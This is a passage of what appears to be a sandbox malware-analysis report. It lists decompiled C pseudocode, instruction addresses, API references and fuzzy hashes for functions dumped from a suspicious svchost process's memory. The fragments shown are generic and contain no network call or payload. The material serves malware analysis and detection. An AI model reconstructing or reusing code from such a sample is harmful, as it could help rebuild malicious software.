                                                                                                                                                                                                                                                                          0x040116f3
                                                                                                                                                                                                                                                                          0x040116f8
                                                                                                                                                                                                                                                                          0x040116fb
                                                                                                                                                                                                                                                                          0x04011701
                                                                                                                                                                                                                                                                          0x04011709
                                                                                                                                                                                                                                                                          0x04011712
                                                                                                                                                                                                                                                                          0x04011720
                                                                                                                                                                                                                                                                          0x0401172e
                                                                                                                                                                                                                                                                          0x04011736
                                                                                                                                                                                                                                                                          0x0401174f
                                                                                                                                                                                                                                                                          0x04011756
                                                                                                                                                                                                                                                                          0x0401175a
                                                                                                                                                                                                                                                                          0x0401175f
                                                                                                                                                                                                                                                                          0x04011762
                                                                                                                                                                                                                                                                          0x04011769
                                                                                                                                                                                                                                                                          0x04011778
                                                                                                                                                                                                                                                                          0x0401176b
                                                                                                                                                                                                                                                                          0x04011773
                                                                                                                                                                                                                                                                          0x04011773
                                                                                                                                                                                                                                                                          0x0401177f
                                                                                                                                                                                                                                                                          0x04011782
                                                                                                                                                                                                                                                                          0x04011789
                                                                                                                                                                                                                                                                          0x0401178e
                                                                                                                                                                                                                                                                          0x04011799
                                                                                                                                                                                                                                                                          0x04011799
                                                                                                                                                                                                                                                                          0x040117a2
                                                                                                                                                                                                                                                                          0x040117a4
                                                                                                                                                                                                                                                                          0x040117a7
                                                                                                                                                                                                                                                                          0x040117ae
                                                                                                                                                                                                                                                                          0x040117b3
                                                                                                                                                                                                                                                                          0x040117b6
                                                                                                                                                                                                                                                                          0x040117b6
                                                                                                                                                                                                                                                                          0x040117c1
                                                                                                                                                                                                                                                                          0x040117c6
                                                                                                                                                                                                                                                                          0x040117c9
                                                                                                                                                                                                                                                                          0x040117cd
                                                                                                                                                                                                                                                                          0x040117d2
                                                                                                                                                                                                                                                                          0x040117d5
                                                                                                                                                                                                                                                                          0x040117d5
                                                                                                                                                                                                                                                                          0x040117dc
                                                                                                                                                                                                                                                                          0x040117f4

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • _strlen.LIBCMT ref: 040115EE
                                                                                                                                                                                                                                                                          • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 04011615
                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 04011661
                                                                                                                                                                                                                                                                          • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 0401176E
                                                                                                                                                                                                                                                                          • _strlen.LIBCMT ref: 04011789
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.563207738.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000000A.00000002.563207738.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Iterator_baseIterator_base::__strlenstd::_$_memset
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2716363198-0
                                                                                                                                                                                                                                                                          • Opcode ID: 0abad2840db399aae90639b031553a88c883544166d49a401e7ee45cba732544
                                                                                                                                                                                                                                                                          • Instruction ID: 26b02190921c373d841446d0dad60ddd34c3bc106182d84ff6dd49c6febfbb10
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0abad2840db399aae90639b031553a88c883544166d49a401e7ee45cba732544
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB7128B4E00318DFEB14DFA4D884BADB7B1FF48308F248128E609AB390D775A945DB51
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                                                                                                          			E04012470(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                                                                                          				intOrPtr* _v12;
                                                                                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                                                                                          				char _v36;
                                                                                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                                                                                          				void* _v44;
                                                                                                                                                                                                                                                                          				intOrPtr _v48;
                                                                                                                                                                                                                                                                          				intOrPtr _v52;
                                                                                                                                                                                                                                                                          				intOrPtr _v56;
                                                                                                                                                                                                                                                                          				intOrPtr _v60;
                                                                                                                                                                                                                                                                          				intOrPtr _v64;
                                                                                                                                                                                                                                                                          				intOrPtr _v68;
                                                                                                                                                                                                                                                                          				intOrPtr _v72;
                                                                                                                                                                                                                                                                          				intOrPtr _v76;
                                                                                                                                                                                                                                                                          				intOrPtr _v80;
                                                                                                                                                                                                                                                                          				intOrPtr* _v84;
                                                                                                                                                                                                                                                                          				intOrPtr _v88;
                                                                                                                                                                                                                                                                          				intOrPtr _v92;
                                                                                                                                                                                                                                                                          				intOrPtr _t74;
                                                                                                                                                                                                                                                                          				intOrPtr _t83;
                                                                                                                                                                                                                                                                          				intOrPtr _t99;
                                                                                                                                                                                                                                                                          				void* _t101;
                                                                                                                                                                                                                                                                          				void* _t108;
                                                                                                                                                                                                                                                                          				void* _t156;
                                                                                                                                                                                                                                                                          				void* _t157;
                                                                                                                                                                                                                                                                          				signed int _t158;
                                                                                                                                                                                                                                                                          				void* _t159;
                                                                                                                                                                                                                                                                          				void* _t163;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_t157 = __esi;
                                                                                                                                                                                                                                                                          				_t156 = __edi;
                                                                                                                                                                                                                                                                          				_t108 = __ebx;
                                                                                                                                                                                                                                                                          				_v16 =  *0x429024 ^ _t158;
                                                                                                                                                                                                                                                                          				_v80 = __ecx;
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				do {
                                                                                                                                                                                                                                                                          					_v36 =  *0x426fa8;
                                                                                                                                                                                                                                                                          					_v32 =  *0x426fac;
                                                                                                                                                                                                                                                                          					_v28 =  *0x426fb0;
                                                                                                                                                                                                                                                                          					_v24 =  *0x426fb4;
                                                                                                                                                                                                                                                                          					_v20 =  *0x426fb8;
                                                                                                                                                                                                                                                                          					_t74 = E04020CE0(8);
                                                                                                                                                                                                                                                                          					_t159 = _t159 + 4;
                                                                                                                                                                                                                                                                          					_v52 = _t74;
                                                                                                                                                                                                                                                                          					if(_v52 == 0) {
                                                                                                                                                                                                                                                                          						_v84 = 0;
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          						_v84 = E0401F4E0(_v52);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					_v12 = _v84;
                                                                                                                                                                                                                                                                          					E0401FC90(_t108, _v12, _t156, _t157,  &_v36, 0x10);
                                                                                                                                                                                                                                                                          					if((E04015C60(_t108, _v80, _v84, _v12) & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          						_v44 = 0;
                                                                                                                                                                                                                                                                          						_t83 = E0401BCB0(_t156, 4,  *_v12,  &_v44);
                                                                                                                                                                                                                                                                          						_t159 = _t159 + 0xc;
                                                                                                                                                                                                                                                                          						_v40 = _t83;
                                                                                                                                                                                                                                                                          						if(_v40 > 0) {
                                                                                                                                                                                                                                                                          							_v56 = E04020CE0(0x11);
                                                                                                                                                                                                                                                                          							_v48 = _v56;
                                                                                                                                                                                                                                                                          							E04007010(_t156, _v48, 0, 0x11);
                                                                                                                                                                                                                                                                          							 *0x4251f8(_v48, 0x10, 0x426fbc,  *( *_v44 + 4) & 0xff, ( *( *_v44 + 4) & 0xffff) >> 0x00000008 & 0xff,  *( *_v44 + 4) >> 0x00000010 & 0xff, ( *( *_v44 + 4) >> 0x00000010 & 0xffff) >> 0x00000008 & 0xff);
                                                                                                                                                                                                                                                                          							_t99 = E04020CE0(8);
                                                                                                                                                                                                                                                                          							_t163 = _t159 + 0x30;
                                                                                                                                                                                                                                                                          							_v60 = _t99;
                                                                                                                                                                                                                                                                          							if(_v60 == 0) {
                                                                                                                                                                                                                                                                          								_v88 = 0;
                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                          								_v88 = E0401F4E0(_v60);
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_v8 = _v88;
                                                                                                                                                                                                                                                                          							_t101 = E040070A0(_v48);
                                                                                                                                                                                                                                                                          							_t159 = _t163 + 4;
                                                                                                                                                                                                                                                                          							E0401FC90(_t108, _v8, _t156, _t157, _v48, _t101);
                                                                                                                                                                                                                                                                          							if(_v48 != 0) {
                                                                                                                                                                                                                                                                          								_v64 = _v48;
                                                                                                                                                                                                                                                                          								E04020CC0(_v64);
                                                                                                                                                                                                                                                                          								_t159 = _t159 + 4;
                                                                                                                                                                                                                                                                          								_v48 = 0x666;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							if(_v44 != 0) {
                                                                                                                                                                                                                                                                          								_v68 = _v44;
                                                                                                                                                                                                                                                                          								E04020CC0(_v68);
                                                                                                                                                                                                                                                                          								_t159 = _t159 + 4;
                                                                                                                                                                                                                                                                          								_v44 = 0x666;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                          						_v76 = _v12;
                                                                                                                                                                                                                                                                          						_v72 = _v76;
                                                                                                                                                                                                                                                                          						if(_v72 == 0) {
                                                                                                                                                                                                                                                                          							_v92 = 0;
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							_v92 = E04004EA0(_v72, 1);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v12 = 0x666;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          				} while (0 != 0);
                                                                                                                                                                                                                                                                          				return E04006C8C(_v8, _t108, _v16 ^ _t158, 0, _t156, _t157);
                                                                                                                                                                                                                                                                          			}



































                                                                                                                                                                                                                                                                          0x04012470
                                                                                                                                                                                                                                                                          0x04012470
                                                                                                                                                                                                                                                                          0x04012470
                                                                                                                                                                                                                                                                          0x0401247d
                                                                                                                                                                                                                                                                          0x04012480
                                                                                                                                                                                                                                                                          0x04012483
                                                                                                                                                                                                                                                                          0x0401248a
                                                                                                                                                                                                                                                                          0x0401248f
                                                                                                                                                                                                                                                                          0x04012498
                                                                                                                                                                                                                                                                          0x040124a1
                                                                                                                                                                                                                                                                          0x040124a9
                                                                                                                                                                                                                                                                          0x040124b2
                                                                                                                                                                                                                                                                          0x040124b7
                                                                                                                                                                                                                                                                          0x040124bc
                                                                                                                                                                                                                                                                          0x040124bf
                                                                                                                                                                                                                                                                          0x040124c6
                                                                                                                                                                                                                                                                          0x040124d5
                                                                                                                                                                                                                                                                          0x040124c8
                                                                                                                                                                                                                                                                          0x040124d0
                                                                                                                                                                                                                                                                          0x040124d0
                                                                                                                                                                                                                                                                          0x040124df
                                                                                                                                                                                                                                                                          0x040124eb
                                                                                                                                                                                                                                                                          0x04012501
                                                                                                                                                                                                                                                                          0x04012507
                                                                                                                                                                                                                                                                          0x0401251a
                                                                                                                                                                                                                                                                          0x0401251f
                                                                                                                                                                                                                                                                          0x04012522
                                                                                                                                                                                                                                                                          0x04012529
                                                                                                                                                                                                                                                                          0x04012539
                                                                                                                                                                                                                                                                          0x0401253f
                                                                                                                                                                                                                                                                          0x0401254a
                                                                                                                                                                                                                                                                          0x040125d3
                                                                                                                                                                                                                                                                          0x040125de
                                                                                                                                                                                                                                                                          0x040125e3
                                                                                                                                                                                                                                                                          0x040125e6
                                                                                                                                                                                                                                                                          0x040125ed
                                                                                                                                                                                                                                                                          0x040125fc
                                                                                                                                                                                                                                                                          0x040125ef
                                                                                                                                                                                                                                                                          0x040125f7
                                                                                                                                                                                                                                                                          0x040125f7
                                                                                                                                                                                                                                                                          0x04012606
                                                                                                                                                                                                                                                                          0x0401260d
                                                                                                                                                                                                                                                                          0x04012612
                                                                                                                                                                                                                                                                          0x0401261d
                                                                                                                                                                                                                                                                          0x04012626
                                                                                                                                                                                                                                                                          0x0401262b
                                                                                                                                                                                                                                                                          0x04012632
                                                                                                                                                                                                                                                                          0x04012637
                                                                                                                                                                                                                                                                          0x0401263a
                                                                                                                                                                                                                                                                          0x0401263a
                                                                                                                                                                                                                                                                          0x04012645
                                                                                                                                                                                                                                                                          0x0401264a
                                                                                                                                                                                                                                                                          0x04012651
                                                                                                                                                                                                                                                                          0x04012656
                                                                                                                                                                                                                                                                          0x04012659
                                                                                                                                                                                                                                                                          0x04012659
                                                                                                                                                                                                                                                                          0x04012645
                                                                                                                                                                                                                                                                          0x04012529
                                                                                                                                                                                                                                                                          0x04012664
                                                                                                                                                                                                                                                                          0x04012669
                                                                                                                                                                                                                                                                          0x0401266f
                                                                                                                                                                                                                                                                          0x04012676
                                                                                                                                                                                                                                                                          0x04012687
                                                                                                                                                                                                                                                                          0x04012678
                                                                                                                                                                                                                                                                          0x04012682
                                                                                                                                                                                                                                                                          0x04012682
                                                                                                                                                                                                                                                                          0x0401268e
                                                                                                                                                                                                                                                                          0x0401268e
                                                                                                                                                                                                                                                                          0x04012695
                                                                                                                                                                                                                                                                          0x040126ad

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 040124CB
                                                                                                                                                                                                                                                                          • _memset.LIBCMT ref: 0401254A
                                                                                                                                                                                                                                                                          • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 040125F2
                                                                                                                                                                                                                                                                          • _strlen.LIBCMT ref: 0401260D
                                                                                                                                                                                                                                                                          • codecvt.LIBCPMTD ref: 0401267D
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.563207738.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000000A.00000002.563207738.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Iterator_baseIterator_base::_std::_$_memset_strlencodecvt
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2459447590-0
                                                                                                                                                                                                                                                                          • Opcode ID: e9ae77fbe599c57f9ed2e64cca4674112824ea2fac37f94927e6576c1164366d
                                                                                                                                                                                                                                                                          • Instruction ID: 2d0a0b2a9c0e8f4d9cfb9b2fe2ef08dc32606c7a33a305a0369b3e2b17122581
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e9ae77fbe599c57f9ed2e64cca4674112824ea2fac37f94927e6576c1164366d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 837138B0E002199FEB14DFA8D984BEDBBB1FF88318F148169E405BB390D775A944CB54
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 91%
                                                                                                                                                                                                                                                                          			E040135C0(void* __ebx, intOrPtr* __ecx, intOrPtr _a4) {
                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                          				signed int _v9;
                                                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                                                          				intOrPtr* _v20;
                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                                                                          				intOrPtr _v32;
                                                                                                                                                                                                                                                                          				intOrPtr _v36;
                                                                                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                                                                                          				intOrPtr _v44;
                                                                                                                                                                                                                                                                          				intOrPtr _v48;
                                                                                                                                                                                                                                                                          				intOrPtr* _v52;
                                                                                                                                                                                                                                                                          				intOrPtr _v56;
                                                                                                                                                                                                                                                                          				intOrPtr* _v60;
                                                                                                                                                                                                                                                                          				intOrPtr _v64;
                                                                                                                                                                                                                                                                          				intOrPtr _v68;
                                                                                                                                                                                                                                                                          				intOrPtr _v72;
                                                                                                                                                                                                                                                                          				intOrPtr _t81;
                                                                                                                                                                                                                                                                          				intOrPtr _t92;
                                                                                                                                                                                                                                                                          				intOrPtr _t95;
                                                                                                                                                                                                                                                                          				void* _t98;
                                                                                                                                                                                                                                                                          				void* _t128;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_t98 = __ebx;
                                                                                                                                                                                                                                                                          				_v52 = __ecx;
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				_v9 = 0;
                                                                                                                                                                                                                                                                          				while(_a4 != 0) {
                                                                                                                                                                                                                                                                          					if( *((intOrPtr*)( *_v52 + 0x2c)) >= 1) {
                                                                                                                                                                                                                                                                          						_v16 = 0;
                                                                                                                                                                                                                                                                          						while(_v16 <  *((intOrPtr*)( *_v52 + 0x2c))) {
                                                                                                                                                                                                                                                                          							_t81 = E04020CE0(8);
                                                                                                                                                                                                                                                                          							_t128 = _t128 + 4;
                                                                                                                                                                                                                                                                          							_v28 = _t81;
                                                                                                                                                                                                                                                                          							if(_v28 == 0) {
                                                                                                                                                                                                                                                                          								_v60 = 0;
                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                          								_v60 = E0401F4E0(_v28);
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_v20 = _v60;
                                                                                                                                                                                                                                                                          							E0401F9F0(_t98, _v20, _a4,  *((intOrPtr*)(_a4 + 0x1c)),  *((intOrPtr*)(_a4 + 0x20)), 0);
                                                                                                                                                                                                                                                                          							 *((intOrPtr*)(_v52 + 0x10)) = _v16;
                                                                                                                                                                                                                                                                          							if((E04015C60(_t98, _v52, _v16, _v20) & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          								if(_v8 == 0) {
                                                                                                                                                                                                                                                                          									_t92 = E04020CE0(8);
                                                                                                                                                                                                                                                                          									_t128 = _t128 + 4;
                                                                                                                                                                                                                                                                          									_v32 = _t92;
                                                                                                                                                                                                                                                                          									if(_v32 == 0) {
                                                                                                                                                                                                                                                                          										_v64 = 0;
                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                          										_v64 = E0401F4E0(_v32);
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          									_v8 = _v64;
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								E0401F9F0(_t98, _v8, _v20,  *_v20,  *((intOrPtr*)(_v20 + 4)), 0);
                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                          								_v9 = 1;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							if(_v20 != 0) {
                                                                                                                                                                                                                                                                          								_v40 = _v20;
                                                                                                                                                                                                                                                                          								_v36 = _v40;
                                                                                                                                                                                                                                                                          								if(_v36 == 0) {
                                                                                                                                                                                                                                                                          									_v68 = 0;
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									_v68 = E04004EA0(_v36, 1);
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          								_v20 = 0x666;
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							if((_v9 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                          								_v16 = _v16 + 1;
                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							goto L30;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                          						_t95 = E04020CE0(8);
                                                                                                                                                                                                                                                                          						_t128 = _t128 + 4;
                                                                                                                                                                                                                                                                          						_v24 = _t95;
                                                                                                                                                                                                                                                                          						if(_v24 == 0) {
                                                                                                                                                                                                                                                                          							_v56 = 0;
                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                          							_v56 = E0401F4E0(_v24);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v8 = _v56;
                                                                                                                                                                                                                                                                          						 *((intOrPtr*)(_v8 + 4)) = 0;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					L30:
                                                                                                                                                                                                                                                                          					if((_v9 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                          						if(_v8 != 0) {
                                                                                                                                                                                                                                                                          							_v48 = _v8;
                                                                                                                                                                                                                                                                          							_v44 = _v48;
                                                                                                                                                                                                                                                                          							if(_v44 == 0) {
                                                                                                                                                                                                                                                                          								_v72 = 0;
                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                          								_v72 = E04004EA0(_v44, 1);
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							_v8 = 0x666;
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						_v8 = 0;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(0 != 0) {
                                                                                                                                                                                                                                                                          						continue;
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					L38:
                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          				goto L38;
                                                                                                                                                                                                                                                                          			}

























                                                                                                                                                                                                                                                                          0x040135c0
                                                                                                                                                                                                                                                                          0x040135c6
                                                                                                                                                                                                                                                                          0x040135c9
                                                                                                                                                                                                                                                                          0x040135d0
                                                                                                                                                                                                                                                                          0x040135d4
                                                                                                                                                                                                                                                                          0x040135e8
                                                                                                                                                                                                                                                                          0x04013626
                                                                                                                                                                                                                                                                          0x04013638
                                                                                                                                                                                                                                                                          0x0401364b
                                                                                                                                                                                                                                                                          0x04013650
                                                                                                                                                                                                                                                                          0x04013653
                                                                                                                                                                                                                                                                          0x0401365a
                                                                                                                                                                                                                                                                          0x04013669
                                                                                                                                                                                                                                                                          0x0401365c
                                                                                                                                                                                                                                                                          0x04013664
                                                                                                                                                                                                                                                                          0x04013664
                                                                                                                                                                                                                                                                          0x04013673
                                                                                                                                                                                                                                                                          0x04013689
                                                                                                                                                                                                                                                                          0x04013694
                                                                                                                                                                                                                                                                          0x040136a8
                                                                                                                                                                                                                                                                          0x040136b4
                                                                                                                                                                                                                                                                          0x040136b8
                                                                                                                                                                                                                                                                          0x040136bd
                                                                                                                                                                                                                                                                          0x040136c0
                                                                                                                                                                                                                                                                          0x040136c7
                                                                                                                                                                                                                                                                          0x040136d6
                                                                                                                                                                                                                                                                          0x040136c9
                                                                                                                                                                                                                                                                          0x040136d1
                                                                                                                                                                                                                                                                          0x040136d1
                                                                                                                                                                                                                                                                          0x040136e0
                                                                                                                                                                                                                                                                          0x040136e0
                                                                                                                                                                                                                                                                          0x040136f5
                                                                                                                                                                                                                                                                          0x040136aa
                                                                                                                                                                                                                                                                          0x040136aa
                                                                                                                                                                                                                                                                          0x040136aa
                                                                                                                                                                                                                                                                          0x040136fe
                                                                                                                                                                                                                                                                          0x04013703
                                                                                                                                                                                                                                                                          0x04013709
                                                                                                                                                                                                                                                                          0x04013710
                                                                                                                                                                                                                                                                          0x04013721
                                                                                                                                                                                                                                                                          0x04013712
                                                                                                                                                                                                                                                                          0x0401371c
                                                                                                                                                                                                                                                                          0x0401371c
                                                                                                                                                                                                                                                                          0x04013728
                                                                                                                                                                                                                                                                          0x04013728
                                                                                                                                                                                                                                                                          0x04013735
                                                                                                                                                                                                                                                                          0x04013635
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04013737
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04013735
                                                                                                                                                                                                                                                                          0x040135ea
                                                                                                                                                                                                                                                                          0x040135ec
                                                                                                                                                                                                                                                                          0x040135f1
                                                                                                                                                                                                                                                                          0x040135f4
                                                                                                                                                                                                                                                                          0x040135fb
                                                                                                                                                                                                                                                                          0x0401360a
                                                                                                                                                                                                                                                                          0x040135fd
                                                                                                                                                                                                                                                                          0x04013605
                                                                                                                                                                                                                                                                          0x04013605
                                                                                                                                                                                                                                                                          0x04013614
                                                                                                                                                                                                                                                                          0x0401361a
                                                                                                                                                                                                                                                                          0x0401361a
                                                                                                                                                                                                                                                                          0x0401373e
                                                                                                                                                                                                                                                                          0x04013744
                                                                                                                                                                                                                                                                          0x0401374a
                                                                                                                                                                                                                                                                          0x0401374f
                                                                                                                                                                                                                                                                          0x04013755
                                                                                                                                                                                                                                                                          0x0401375c
                                                                                                                                                                                                                                                                          0x0401376d
                                                                                                                                                                                                                                                                          0x0401375e
                                                                                                                                                                                                                                                                          0x04013768
                                                                                                                                                                                                                                                                          0x04013768
                                                                                                                                                                                                                                                                          0x04013774
                                                                                                                                                                                                                                                                          0x04013774
                                                                                                                                                                                                                                                                          0x0401377b
                                                                                                                                                                                                                                                                          0x0401377b
                                                                                                                                                                                                                                                                          0x04013784
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0401378a
                                                                                                                                                                                                                                                                          0x04013790
                                                                                                                                                                                                                                                                          0x04013790
                                                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 04013600
                                                                                                                                                                                                                                                                          • codecvt.LIBCPMTD ref: 04013763
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 0000000A.00000002.563207738.0000000004000000.00000040.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 0000000A.00000002.563207738.000000000408A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_4000000_svchost.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Iterator_baseIterator_base::_codecvtstd::_
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3817610042-0
                                                                                                                                                                                                                                                                          • Opcode ID: f1128d24d620c5156b89d421dd3da55f990c9896146a5d0fdb04f4f7fc45e4ab
                                                                                                                                                                                                                                                                          • Instruction ID: 940426154ba22623eb4585301945e88a2baf8d43e6e943a63c159829dd530f10
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f1128d24d620c5156b89d421dd3da55f990c9896146a5d0fdb04f4f7fc45e4ab
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 355105B4E01219EFEB14DF94D594BEEBBB1BB48308F208169E8057B3A0D7756A44CB91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          C-Code - Quality: 18%
                                                                                                                                                                                                                                                                          			E04020920(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, signed int _a8) {
                                                                                                                                                                                                                                                                          				char _v8;
                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                                                                                                          				intOrPtr _v24;
                                                                                                                                                                                                                                                                          				signed int _v28;
                                                                                                                                                                                                                                                                          				intOrPtr _v40;
                                                                                                                                                                                                                                                                          				short _v42;
                                                                                                                                                                                                                                                                          				char _v44;
                                                                                                                                                                                                                                                                          				intOrPtr _v48;
                                                                                                                                                                                                                                                                          				intOrPtr _v52;
                                                                                                                                                                                                                                                                          				intOrPtr _v56;
                                                                                                                                                                                                                                                                          				intOrPtr _v60;
                                                                                                                                                                                                                                                                          				intOrPtr _v64;
                                                                                                                                                                                                                                                                          				intOrPtr _v68;
                                                                                                                                                                                                                                                                          				intOrPtr _v72;
                                                                                                                                                                                                                                                                          				intOrPtr _t101;
                                                                                                                                                                                                                                                                          				intOrPtr _t102;
                                                                                                                                                                                                                                                                          				intOrPtr _t106;
                                                                                                                                                                                                                                                                          				void* _t126;
                                                                                                                                                                                                                                                                          				intOrPtr _t140;
                                                                                                                                                                                                                                                                          				void* _t162;
                                                                                                                                                                                                                                                                          				void* _t163;
                                                                                                                                                                                                                                                                          				signed int _t164;
                                                                                                                                                                                                                                                                          				void* _t165;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_t163 = __esi;
                                                                                                                                                                                                                                                                          				_t162 = __edi;
                                                                                                                                                                                                                                                                          				_t126 = __ebx;
                                                                                                                                                                                                                                                                          				_v28 =  *0x429024 ^ _t164;
                                                                                                                                                                                                                                                                          				_v64 = __ecx;
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				do {
                                                                                                                                                                                                                                                                          					_v16 = 0xffffffff;
                                                                                                                                                                                                                                                                          					_v12 = 0;
